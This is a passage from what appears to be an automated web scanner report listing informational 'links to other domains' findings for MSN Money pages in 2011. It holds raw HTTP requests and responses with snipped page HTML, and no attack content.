Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:40 GMT
Content-Length: 61323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353380&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.206. http://money.redacted/mutual-fund/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mutual-fund/default-dyn.aspx?cp-documentid=6783739 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=c17fb51b2148461c84e7aa6afbc979cb; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:59 GMT
Content-Length: 61323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344879&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.207. http://money.redacted/mutual-fund/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mutual-fund/default-dyn.aspx?cp-documentid=6783739 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:54:58 GMT
Content-Length: 61323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410099&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.208. http://money.redacted/saving-money/50-30-20-budget.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /saving-money/50-30-20-budget.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /saving-money/50-30-20-budget.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:56:09 GMT
Content-Length: 33120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410169&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money - Strategies for saving more" shape="rect" coords="15,1,263,72" /><area href="http://learn.bankofamerica.com/" alt="Sponsored by Bank of America" shape="rect" coords="833,20,977,50" /><area href="http://lifestyle.redacted/your-life/your-money-today/" alt="MSN Lifestyle" shape="rect" coords="805,60,865,80" />
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&amp;form=money3">What is the secret to saving money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&amp;form=money3">How much of my pay should I save?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&amp;form=money3">I want to retire at 50. How much do I need?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+can+i+budget+to+save&amp;go=&amp;form=money3">How can I budget to save money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&amp;form=money3">How is a credit union different from a bank?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Should+an+adult+have+an+allowance&amp;form=money3">Should an adult have an allowance?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.209. http://money.redacted/saving-money/50-30-20-budget.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /saving-money/50-30-20-budget.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /saving-money/50-30-20-budget.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:48 GMT
Content-Length: 33120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353389&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money - Strategies for saving more" shape="rect" coords="15,1,263,72" /><area href="http://learn.bankofamerica.com/" alt="Sponsored by Bank of America" shape="rect" coords="833,20,977,50" /><area href="http://lifestyle.redacted/your-life/your-money-today/" alt="MSN Lifestyle" shape="rect" coords="805,60,865,80" />
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&amp;form=money3">What is the secret to saving money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&amp;form=money3">How much of my pay should I save?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&amp;form=money3">I want to retire at 50. How much do I need?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+can+i+budget+to+save&amp;go=&amp;form=money3">How can I budget to save money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&amp;form=money3">How is a credit union different from a bank?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Should+an+adult+have+an+allowance&amp;form=money3">Should an adult have an allowance?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.210. http://money.redacted/saving-money/50-30-20-budget.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /saving-money/50-30-20-budget.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /saving-money/50-30-20-budget.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=bffcebe3a61d44229031c1bc65653d0a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:07 GMT
Content-Length: 33120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344888&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money - Strategies for saving more" shape="rect" coords="15,1,263,72" /><area href="http://learn.bankofamerica.com/" alt="Sponsored by Bank of America" shape="rect" coords="833,20,977,50" /><area href="http://lifestyle.redacted/your-life/your-money-today/" alt="MSN Lifestyle" shape="rect" coords="805,60,865,80" />
...[SNIP]...
<div class="br br1"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js"></script>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=What+is+the+secret+to+saving+money&amp;form=money3">What is the secret to saving money?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&amp;form=money3">How much of my pay should I save?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&amp;form=money3">I want to retire at 50. How much do I need?</a>
